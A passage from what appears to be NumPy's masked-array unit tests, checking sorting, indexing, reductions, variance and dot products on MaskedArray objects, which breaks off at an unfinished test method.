def test_argmax_argmin(self):
# Tests argmin & argmax on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_equal(mx.argmin(), 35)
assert_equal(mX.argmin(), 35)
assert_equal(m2x.argmin(), 4)
assert_equal(m2X.argmin(), 4)
assert_equal(mx.argmax(), 28)
assert_equal(mX.argmax(), 28)
assert_equal(m2x.argmax(), 31)
assert_equal(m2X.argmax(), 31)
assert_equal(mX.argmin(0), [2, 2, 2, 5, 0, 5])
assert_equal(m2X.argmin(0), [2, 2, 4, 5, 0, 4])
assert_equal(mX.argmax(0), [0, 5, 0, 5, 4, 0])
assert_equal(m2X.argmax(0), [5, 5, 0, 5, 1, 0])
assert_equal(mX.argmin(1), [4, 1, 0, 0, 5, 5, ])
assert_equal(m2X.argmin(1), [4, 4, 0, 0, 5, 3])
assert_equal(mX.argmax(1), [2, 4, 1, 1, 4, 1])
assert_equal(m2X.argmax(1), [2, 4, 1, 1, 1, 1])
def test_clip(self):
# Tests clip on MaskedArrays.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
m = np.array([0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0])
mx = array(x, mask=m)
clipped = mx.clip(2, 8)
assert_equal(clipped.mask, mx.mask)
assert_equal(clipped._data, x.clip(2, 8))
assert_equal(clipped._data, mx._data.clip(2, 8))
def test_compress(self):
# test compress
a = masked_array([1., 2., 3., 4., 5.], fill_value=9999)
condition = (a > 1.5) & (a < 3.5)
assert_equal(a.compress(condition), [2., 3.])
a[[2, 3]] = masked
b = a.compress(condition)
assert_equal(b._data, [2., 3.])
assert_equal(b._mask, [0, 1])
assert_equal(b.fill_value, 9999)
assert_equal(b, a[condition])
condition = (a < 4.)
b = a.compress(condition)
assert_equal(b._data, [1., 2., 3.])
assert_equal(b._mask, [0, 0, 1])
assert_equal(b.fill_value, 9999)
assert_equal(b, a[condition])
a = masked_array([[10, 20, 30], [40, 50, 60]],
mask=[[0, 0, 1], [1, 0, 0]])
b = a.compress(a.ravel() >= 22)
assert_equal(b._data, [30, 40, 50, 60])
assert_equal(b._mask, [1, 1, 0, 0])
x = np.array([3, 1, 2])
b = a.compress(x >= 2, axis=1)
assert_equal(b._data, [[10, 30], [40, 60]])
assert_equal(b._mask, [[0, 1], [1, 0]])
def test_compressed(self):
# Tests compressed
a = array([1, 2, 3, 4], mask=[0, 0, 0, 0])
b = a.compressed()
assert_equal(b, a)
a[0] = masked
b = a.compressed()
assert_equal(b, [2, 3, 4])
a = array(np.matrix([1, 2, 3, 4]), mask=[0, 0, 0, 0])
b = a.compressed()
assert_equal(b, a)
self.assertTrue(isinstance(b, np.matrix))
a[0, 0] = masked
b = a.compressed()
assert_equal(b, [[2, 3, 4]])
def test_empty(self):
# Tests empty/like
datatype = [('a', int), ('b', float), ('c', '|S8')]
a = masked_array([(1, 1.1, '1.1'), (2, 2.2, '2.2'), (3, 3.3, '3.3')],
dtype=datatype)
assert_equal(len(a.fill_value.item()), len(datatype))
b = empty_like(a)
assert_equal(b.shape, a.shape)
assert_equal(b.fill_value, a.fill_value)
b = empty(len(a), dtype=datatype)
assert_equal(b.shape, a.shape)
assert_equal(b.fill_value, a.fill_value)
# check empty_like mask handling
a = masked_array([1, 2, 3], mask=[False, True, False])
b = empty_like(a)
assert_(not np.may_share_memory(a.mask, b.mask))
b = a.view(masked_array)
assert_(np.may_share_memory(a.mask, b.mask))
def test_put(self):
# Tests put.
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
x = array(d, mask=m)
self.assertTrue(x[3] is masked)
self.assertTrue(x[4] is masked)
x[[1, 4]] = [10, 40]
#self.assertTrue(x.mask is not m)
self.assertTrue(x[3] is masked)
self.assertTrue(x[4] is not masked)
assert_equal(x, [0, 10, 2, -1, 40])
x = masked_array(arange(10), mask=[1, 0, 0, 0, 0] * 2)
i = [0, 2, 4, 6]
x.put(i, [6, 4, 2, 0])
assert_equal(x, asarray([6, 1, 4, 3, 2, 5, 0, 7, 8, 9, ]))
assert_equal(x.mask, [0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
x.put(i, masked_array([0, 2, 4, 6], [1, 0, 1, 0]))
assert_array_equal(x, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ])
assert_equal(x.mask, [1, 0, 0, 0, 1, 1, 0, 0, 0, 0])
x = masked_array(arange(10), mask=[1, 0, 0, 0, 0] * 2)
put(x, i, [6, 4, 2, 0])
assert_equal(x, asarray([6, 1, 4, 3, 2, 5, 0, 7, 8, 9, ]))
assert_equal(x.mask, [0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
put(x, i, masked_array([0, 2, 4, 6], [1, 0, 1, 0]))
assert_array_equal(x, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ])
assert_equal(x.mask, [1, 0, 0, 0, 1, 1, 0, 0, 0, 0])
def test_put_nomask(self):
# GitHub issue 6425
x = zeros(10)
z = array([3., -1.], mask=[False, True])
x.put([1, 2], z)
self.assertTrue(x[0] is not masked)
assert_equal(x[0], 0)
self.assertTrue(x[1] is not masked)
assert_equal(x[1], 3)
self.assertTrue(x[2] is masked)
self.assertTrue(x[3] is not masked)
assert_equal(x[3], 0)
def test_put_hardmask(self):
# Tests put on hardmask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d + 1, mask=m, hard_mask=True, copy=True)
xh.put([4, 2, 0, 1, 3], [1, 2, 3, 4, 5])
assert_equal(xh._data, [3, 4, 2, 4, 5])
def test_putmask(self):
x = arange(6) + 1
mx = array(x, mask=[0, 0, 0, 1, 1, 1])
mask = [0, 0, 1, 0, 0, 1]
# w/o mask, w/o masked values
xx = x.copy()
putmask(xx, mask, 99)
assert_equal(xx, [1, 2, 99, 4, 5, 99])
# w/ mask, w/o masked values
mxx = mx.copy()
putmask(mxx, mask, 99)
assert_equal(mxx._data, [1, 2, 99, 4, 5, 99])
assert_equal(mxx._mask, [0, 0, 0, 1, 1, 0])
# w/o mask, w/ masked values
values = array([10, 20, 30, 40, 50, 60], mask=[1, 1, 1, 0, 0, 0])
xx = x.copy()
putmask(xx, mask, values)
assert_equal(xx._data, [1, 2, 30, 4, 5, 60])
assert_equal(xx._mask, [0, 0, 1, 0, 0, 0])
# w/ mask, w/ masked values
mxx = mx.copy()
putmask(mxx, mask, values)
assert_equal(mxx._data, [1, 2, 30, 4, 5, 60])
assert_equal(mxx._mask, [0, 0, 1, 1, 1, 0])
# w/ mask, w/ masked values + hardmask
mxx = mx.copy()
mxx.harden_mask()
putmask(mxx, mask, values)
assert_equal(mxx, [1, 2, 30, 4, 5, 60])
def test_ravel(self):
# Tests ravel
a = array([[1, 2, 3, 4, 5]], mask=[[0, 1, 0, 0, 0]])
aravel = a.ravel()
assert_equal(aravel._mask.shape, aravel.shape)
a = array([0, 0], mask=[1, 1])
aravel = a.ravel()
assert_equal(aravel._mask.shape, a.shape)
a = array(np.matrix([1, 2, 3, 4, 5]), mask=[[0, 1, 0, 0, 0]])
aravel = a.ravel()
assert_equal(aravel.shape, (1, 5))
assert_equal(aravel._mask.shape, a.shape)
# Checks that small_mask is preserved
a = array([1, 2, 3, 4], mask=[0, 0, 0, 0], shrink=False)
assert_equal(a.ravel()._mask, [0, 0, 0, 0])
# Test that the fill_value is preserved
a.fill_value = -99
a.shape = (2, 2)
ar = a.ravel()
assert_equal(ar._mask, [0, 0, 0, 0])
assert_equal(ar._data, [1, 2, 3, 4])
assert_equal(ar.fill_value, -99)
# Test index ordering
assert_equal(a.ravel(order='C'), [1, 2, 3, 4])
assert_equal(a.ravel(order='F'), [1, 3, 2, 4])
def test_reshape(self):
# Tests reshape
x = arange(4)
x[0] = masked
y = x.reshape(2, 2)
assert_equal(y.shape, (2, 2,))
assert_equal(y._mask.shape, (2, 2,))
assert_equal(x.shape, (4,))
assert_equal(x._mask.shape, (4,))
def test_sort(self):
# Test sort
x = array([1, 4, 2, 3], mask=[0, 1, 0, 0], dtype=np.uint8)
sortedx = sort(x)
assert_equal(sortedx._data, [1, 2, 3, 4])
assert_equal(sortedx._mask, [0, 0, 0, 1])
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [4, 1, 2, 3])
assert_equal(sortedx._mask, [1, 0, 0, 0])
x.sort()
assert_equal(x._data, [1, 2, 3, 4])
assert_equal(x._mask, [0, 0, 0, 1])
x = array([1, 4, 2, 3], mask=[0, 1, 0, 0], dtype=np.uint8)
x.sort(endwith=False)
assert_equal(x._data, [4, 1, 2, 3])
assert_equal(x._mask, [1, 0, 0, 0])
x = [1, 4, 2, 3]
sortedx = sort(x)
self.assertTrue(not isinstance(sorted, MaskedArray))
x = array([0, 1, -1, -2, 2], mask=nomask, dtype=np.int8)
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [-2, -1, 0, 1, 2])
x = array([0, 1, -1, -2, 2], mask=[0, 1, 0, 0, 1], dtype=np.int8)
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [1, 2, -2, -1, 0])
assert_equal(sortedx._mask, [1, 1, 0, 0, 0])
def test_sort_2d(self):
# Check sort of 2D array.
# 2D array w/o mask
a = masked_array([[8, 4, 1], [2, 0, 9]])
a.sort(0)
assert_equal(a, [[2, 0, 1], [8, 4, 9]])
a = masked_array([[8, 4, 1], [2, 0, 9]])
a.sort(1)
assert_equal(a, [[1, 4, 8], [0, 2, 9]])
# 2D array w/mask
a = masked_array([[8, 4, 1], [2, 0, 9]], mask=[[1, 0, 0], [0, 0, 1]])
a.sort(0)
assert_equal(a, [[2, 0, 1], [8, 4, 9]])
assert_equal(a._mask, [[0, 0, 0], [1, 0, 1]])
a = masked_array([[8, 4, 1], [2, 0, 9]], mask=[[1, 0, 0], [0, 0, 1]])
a.sort(1)
assert_equal(a, [[1, 4, 8], [0, 2, 9]])
assert_equal(a._mask, [[0, 0, 1], [0, 0, 1]])
# 3D
a = masked_array([[[7, 8, 9], [4, 5, 6], [1, 2, 3]],
[[1, 2, 3], [7, 8, 9], [4, 5, 6]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]],
[[4, 5, 6], [1, 2, 3], [7, 8, 9]]])
a[a % 4 == 0] = masked
am = a.copy()
an = a.filled(99)
am.sort(0)
an.sort(0)
assert_equal(am, an)
am = a.copy()
an = a.filled(99)
am.sort(1)
an.sort(1)
assert_equal(am, an)
am = a.copy()
an = a.filled(99)
am.sort(2)
an.sort(2)
assert_equal(am, an)
def test_sort_flexible(self):
# Test sort on flexible dtype.
a = array(
data=[(3, 3), (3, 2), (2, 2), (2, 1), (1, 0), (1, 1), (1, 2)],
mask=[(0, 0), (0, 1), (0, 0), (0, 0), (1, 0), (0, 0), (0, 0)],
dtype=[('A', int), ('B', int)])
test = sort(a)
b = array(
data=[(1, 1), (1, 2), (2, 1), (2, 2), (3, 3), (3, 2), (1, 0)],
mask=[(0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (0, 1), (1, 0)],
dtype=[('A', int), ('B', int)])
assert_equal(test, b)
assert_equal(test.mask, b.mask)
test = sort(a, endwith=False)
b = array(
data=[(1, 0), (1, 1), (1, 2), (2, 1), (2, 2), (3, 2), (3, 3), ],
mask=[(1, 0), (0, 0), (0, 0), (0, 0), (0, 0), (0, 1), (0, 0), ],
dtype=[('A', int), ('B', int)])
assert_equal(test, b)
assert_equal(test.mask, b.mask)
def test_argsort(self):
# Test argsort
a = array([1, 5, 2, 4, 3], mask=[1, 0, 0, 1, 0])
assert_equal(np.argsort(a), argsort(a))
def test_squeeze(self):
# Check squeeze
data = masked_array([[1, 2, 3]])
assert_equal(data.squeeze(), [1, 2, 3])
data = masked_array([[1, 2, 3]], mask=[[1, 1, 1]])
assert_equal(data.squeeze(), [1, 2, 3])
assert_equal(data.squeeze()._mask, [1, 1, 1])
data = masked_array([[1]], mask=True)
self.assertTrue(data.squeeze() is masked)
def test_swapaxes(self):
# Tests swapaxes on MaskedArrays.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mX = array(x, mask=m).reshape(6, 6)
mXX = mX.reshape(3, 2, 2, 3)
mXswapped = mX.swapaxes(0, 1)
assert_equal(mXswapped[-1], mX[:, -1])
mXXswapped = mXX.swapaxes(0, 2)
assert_equal(mXXswapped.shape, (2, 2, 3, 3))
def test_take(self):
# Tests take
x = masked_array([10, 20, 30, 40], [0, 1, 0, 1])
assert_equal(x.take([0, 0, 3]), masked_array([10, 10, 40], [0, 0, 1]))
assert_equal(x.take([0, 0, 3]), x[[0, 0, 3]])
assert_equal(x.take([[0, 1], [0, 1]]),
masked_array([[10, 20], [10, 20]], [[0, 1], [0, 1]]))
x = array([[10, 20, 30], [40, 50, 60]], mask=[[0, 0, 1], [1, 0, 0, ]])
assert_equal(x.take([0, 2], axis=1),
array([[10, 30], [40, 60]], mask=[[0, 1], [1, 0]]))
assert_equal(take(x, [0, 2], axis=1),
array([[10, 30], [40, 60]], mask=[[0, 1], [1, 0]]))
def test_take_masked_indices(self):
# Test take w/ masked indices
a = np.array((40, 18, 37, 9, 22))
indices = np.arange(3)[None,:] + np.arange(5)[:, None]
mindices = array(indices, mask=(indices >= len(a)))
# No mask
test = take(a, mindices, mode='clip')
ctrl = array([[40, 18, 37],
[18, 37, 9],
[37, 9, 22],
[9, 22, 22],
[22, 22, 22]])
assert_equal(test, ctrl)
# Masked indices
test = take(a, mindices)
ctrl = array([[40, 18, 37],
[18, 37, 9],
[37, 9, 22],
[9, 22, 40],
[22, 40, 40]])
ctrl[3, 2] = ctrl[4, 1] = ctrl[4, 2] = masked
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
# Masked input + masked indices
a = array((40, 18, 37, 9, 22), mask=(0, 1, 0, 0, 0))
test = take(a, mindices)
ctrl[0, 1] = ctrl[1, 0] = masked
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
def test_tolist(self):
# Tests to list
# ... on 1D
x = array(np.arange(12))
x[[1, -2]] = masked
xlist = x.tolist()
self.assertTrue(xlist[1] is None)
self.assertTrue(xlist[-2] is None)
# ... on 2D
x.shape = (3, 4)
xlist = x.tolist()
ctrl = [[0, None, 2, 3], [4, 5, 6, 7], [8, 9, None, 11]]
assert_equal(xlist[0], [0, None, 2, 3])
assert_equal(xlist[1], [4, 5, 6, 7])
assert_equal(xlist[2], [8, 9, None, 11])
assert_equal(xlist, ctrl)
# ... on structured array w/ masked records
x = array(list(zip([1, 2, 3],
[1.1, 2.2, 3.3],
['one', 'two', 'thr'])),
dtype=[('a', int), ('b', float), ('c', '|S8')])
x[-1] = masked
assert_equal(x.tolist(),
[(1, 1.1, asbytes('one')),
(2, 2.2, asbytes('two')),
(None, None, None)])
# ... on structured array w/ masked fields
a = array([(1, 2,), (3, 4)], mask=[(0, 1), (0, 0)],
dtype=[('a', int), ('b', int)])
test = a.tolist()
assert_equal(test, [[1, None], [3, 4]])
# ... on mvoid
a = a[0]
test = a.tolist()
assert_equal(test, [1, None])
def test_tolist_specialcase(self):
# Test mvoid.tolist: make sure we return a standard Python object
a = array([(0, 1), (2, 3)], dtype=[('a', int), ('b', int)])
# w/o mask: each entry is a np.void whose elements are standard Python
for entry in a:
for item in entry.tolist():
assert_(not isinstance(item, np.generic))
# w/ mask: each entry is a ma.void whose elements should be
# standard Python
a.mask[0] = (0, 1)
for entry in a:
for item in entry.tolist():
assert_(not isinstance(item, np.generic))
def test_toflex(self):
# Test the conversion to records
data = arange(10)
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
ndtype = [('i', int), ('s', '|S3'), ('f', float)]
data = array([(i, s, f) for (i, s, f) in zip(np.arange(10),
'ABCDEFGHIJKLM',
np.random.rand(10))],
dtype=ndtype)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
ndtype = np.dtype("int, (2,3)float, float")
data = array([(i, f, ff) for (i, f, ff) in zip(np.arange(10),
np.random.rand(10),
np.random.rand(10))],
dtype=ndtype)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal_records(record['_data'], data._data)
assert_equal_records(record['_mask'], data._mask)
def test_fromflex(self):
# Test the reconstruction of a masked_array from a record
a = array([1, 2, 3])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.mask, a.mask)
a = array([1, 2, 3], mask=[0, 0, 1])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.mask, a.mask)
a = array([(1, 1.), (2, 2.), (3, 3.)], mask=[(1, 0), (0, 0), (0, 1)],
dtype=[('A', int), ('B', float)])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.data, a.data)
def test_arraymethod(self):
# Test a _arraymethod w/ n argument
marray = masked_array([[1, 2, 3, 4, 5]], mask=[0, 0, 1, 0, 0])
control = masked_array([[1], [2], [3], [4], [5]],
mask=[0, 0, 1, 0, 0])
assert_equal(marray.T, control)
assert_equal(marray.transpose(), control)
assert_equal(MaskedArray.cumsum(marray.T, 0), control.cumsum(0))
class TestMaskedArrayMathMethods(TestCase):
def setUp(self):
# Base data definition.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_cumsumprod(self):
# Tests cumsum & cumprod on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
mXcp = mX.cumsum(0)
assert_equal(mXcp._data, mX.filled(0).cumsum(0))
mXcp = mX.cumsum(1)
assert_equal(mXcp._data, mX.filled(0).cumsum(1))
mXcp = mX.cumprod(0)
assert_equal(mXcp._data, mX.filled(1).cumprod(0))
mXcp = mX.cumprod(1)
assert_equal(mXcp._data, mX.filled(1).cumprod(1))
def test_cumsumprod_with_output(self):
# Tests cumsum/cumprod w/ output
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
for funcname in ('cumsum', 'cumprod'):
npfunc = getattr(np, funcname)
xmmeth = getattr(xm, funcname)
# A ndarray as explicit input
output = np.empty((3, 4), dtype=float)
output.fill(-9999)
result = npfunc(xm, axis=0, out=output)
# ... the result should be the given output
self.assertTrue(result is output)
assert_equal(result, xmmeth(axis=0, out=output))
output = empty((3, 4), dtype=int)
result = xmmeth(axis=0, out=output)
self.assertTrue(result is output)
def test_ptp(self):
# Tests ptp on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
(n, m) = X.shape
assert_equal(mx.ptp(), mx.compressed().ptp())
rows = np.zeros(n, np.float)
cols = np.zeros(m, np.float)
for k in range(m):
cols[k] = mX[:, k].compressed().ptp()
for k in range(n):
rows[k] = mX[k].compressed().ptp()
assert_equal(mX.ptp(0), cols)
assert_equal(mX.ptp(1), rows)
def test_add_object(self):
x = masked_array(['a', 'b'], mask=[1, 0], dtype=object)
y = x + 'x'
assert_equal(y[1], 'bx')
assert_(y.mask[0])
def test_sum_object(self):
# Test sum on object dtype
a = masked_array([1, 2, 3], mask=[1, 0, 0], dtype=np.object)
assert_equal(a.sum(), 5)
a = masked_array([[1, 2, 3], [4, 5, 6]], dtype=object)
assert_equal(a.sum(axis=0), [5, 7, 9])
def test_prod_object(self):
# Test prod on object dtype
a = masked_array([1, 2, 3], mask=[1, 0, 0], dtype=np.object)
assert_equal(a.prod(), 2 * 3)
a = masked_array([[1, 2, 3], [4, 5, 6]], dtype=object)
assert_equal(a.prod(axis=0), [4, 10, 18])
def test_meananom_object(self):
# Test mean/anom on object dtype
a = masked_array([1, 2, 3], dtype=np.object)
assert_equal(a.mean(), 2)
assert_equal(a.anom(), [-1, 0, 1])
def test_trace(self):
# Tests trace on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
mXdiag = mX.diagonal()
assert_equal(mX.trace(), mX.diagonal().compressed().sum())
assert_almost_equal(mX.trace(),
X.trace() - sum(mXdiag.mask * X.diagonal(),
axis=0))
def test_dot(self):
# Tests dot on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
fx = mx.filled(0)
r = mx.dot(mx)
assert_almost_equal(r.filled(0), fx.dot(fx))
assert_(r.mask is nomask)
fX = mX.filled(0)
r = mX.dot(mX)
assert_almost_equal(r.filled(0), fX.dot(fX))
assert_(r.mask[1,3])
r1 = empty_like(r)
mX.dot(mX, r1)
assert_almost_equal(r, r1)
mYY = mXX.swapaxes(-1, -2)
fXX, fYY = mXX.filled(0), mYY.filled(0)
r = mXX.dot(mYY)
assert_almost_equal(r.filled(0), fXX.dot(fYY))
r1 = empty_like(r)
mXX.dot(mYY, r1)
assert_almost_equal(r, r1)
def test_dot_shape_mismatch(self):
# regression test
x = masked_array([[1,2],[3,4]], mask=[[0,1],[0,0]])
y = masked_array([[1,2],[3,4]], mask=[[0,1],[0,0]])
z = masked_array([[0,1],[3,3]])
x.dot(y, out=z)
assert_almost_equal(z.filled(0), [[1, 0], [15, 16]])
assert_almost_equal(z.mask, [[0, 1], [0, 0]])
def test_varstd(self):
# Tests var & std on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_almost_equal(mX.var(axis=None), mX.compressed().var())
assert_almost_equal(mX.std(axis=None), mX.compressed().std())
assert_almost_equal(mX.std(axis=None, ddof=1),
mX.compressed().std(ddof=1))
assert_almost_equal(mX.var(axis=None, ddof=1),
mX.compressed().var(ddof=1))
assert_equal(mXX.var(axis=3).shape, XX.var(axis=3).shape)
assert_equal(mX.var().shape, X.var().shape)
(mXvar0, mXvar1) = (mX.var(axis=0), mX.var(axis=1))
assert_almost_equal(mX.var(axis=None, ddof=2),
mX.compressed().var(ddof=2))
assert_almost_equal(mX.std(axis=None, ddof=2),
mX.compressed().std(ddof=2))
for k in range(6):
assert_almost_equal(mXvar1[k], mX[k].compressed().var())
assert_almost_equal(mXvar0[k], mX[:, k].compressed().var())
assert_almost_equal(np.sqrt(mXvar0[k]),
mX[:, k].compressed().std())
def test_varstd_specialcases(self):
# Test a special case for var
nout = np.array(-1, dtype=float)
mout = array(-1, dtype=float)
x = array(arange(10), mask=True)
for methodname in ('var', 'std'):
method = getattr(x, methodname)
self.assertTrue(method() is masked)
self.assertTrue(method(0) is masked)
self.assertTrue(method(-1) is masked)
# Using a masked array as explicit output
with warnings.catch_warnings():
warnings.simplefilter('ignore')
method(out=mout)
self.assertTrue(mout is not masked)
assert_equal(mout.mask, True)
# Using a ndarray as explicit output
with warnings.catch_warnings():
warnings.simplefilter('ignore')
method(out=nout)
self.assertTrue(np.isnan(nout))
x = array(arange(10), mask=True)
x[-1] = 9
for methodname in ('var', 'std'):
method = getattr(x, methodname)
self.assertTrue(method(ddof=1) is masked)
self.assertTrue(method(0, ddof=1) is masked)
self.assertTrue(method(-1, ddof=1) is masked)
# Using a masked array as explicit output
method(out=mout, ddof=1)
self.assertTrue(mout is not masked)
assert_equal(mout.mask, True)
# Using a ndarray as explicit output
method(out=nout, ddof=1)
self.assertTrue(np.isnan(nout))
def test_varstd_ddof(self):
a = array([[1, 1, 0], [1, 1, 0]], mask=[[0, 0, 1], [0, 0, 1]])
test = a.std(axis=0, ddof=0)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [0, 0, 1])
test = a.std(axis=0, ddof=1)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [0, 0, 1])
test = a.std(axis=0, ddof=2)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [1, 1, 1])
def test_diag(self):
# Test diag
x = arange(9).reshape((3, 3))
x[1, 1] = masked
out = np.diag(x)
assert_equal(out, [0, 4, 8])
out = diag(x)
assert_equal(out, [0, 4, 8])
assert_equal(out.mask, [0, 1, 0])
out = diag(out)
control = array([[0, 0, 0], [0, 4, 0], [0, 0, 8]],
mask=[[0, 0, 0], [0, 1, 0], [0, 0, 0]])
assert_equal(out, control)
def test_axis_methods_nomask(self):
# Test the combination nomask & methods w/ axis
a = array([[1, 2, 3], [4, 5, 6]])
assert_equal(a.sum(0), [5, 7, 9])
assert_equal(a.sum(-1), [6, 15])
assert_equal(a.sum(1), [6, 15])
assert_equal(a.prod(0), [4, 10, 18])
assert_equal(a.prod(-1), [6, 120])
assert_equal(a.prod(1), [6, 120])
assert_equal(a.min(0), [1, 2, 3])
assert_equal(a.min(-1), [1, 4])
assert_equal(a.min(1), [1, 4])
assert_equal(a.max(0), [4, 5, 6])
assert_equal(a.max(-1), [3, 6])
assert_equal(a.max(1), [3, 6])
class TestMaskedArrayMathMethodsComplex(TestCase):
# Test class for miscellaneous MaskedArrays methods.
def setUp(self):
# Base data definition.
x = np.array([8.375j, 7.545j, 8.828j, 8.5j, 1.757j, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479j,
7.189j, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993j])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_varstd(self):
# Tests var & std on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_almost_equal(mX.var(axis=None), mX.compressed().var())
assert_almost_equal(mX.std(axis=None), mX.compressed().std())
assert_equal(mXX.var(axis=3).shape, XX.var(axis=3).shape)
assert_equal(mX.var().shape, X.var().shape)
(mXvar0, mXvar1) = (mX.var(axis=0), mX.var(axis=1))
assert_almost_equal(mX.var(axis=None, ddof=2),
mX.compressed().var(ddof=2))
assert_almost_equal(mX.std(axis=None, ddof=2),
mX.compressed().std(ddof=2))
for k in range(6):
assert_almost_equal(mXvar1[k], mX[k].compressed().var())
assert_almost_equal(mXvar0[k], mX[:, k].compressed().var())
assert_almost_equal(np.sqrt(mXvar0[k]),
mX[:, k].compressed().std())
class TestMaskedArrayFunctions(TestCase):
# Test class for miscellaneous functions.
def setUp(self):
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
xm.set_fill_value(1e+20)
self.info = (xm, ym)
def test_masked_where_bool(self):
x = [1, 2]
y = masked_where(False, x)
assert_equal(y, [1, 2])
assert_equal(y[1], 2)
def test_masked_equal_wlist(self):
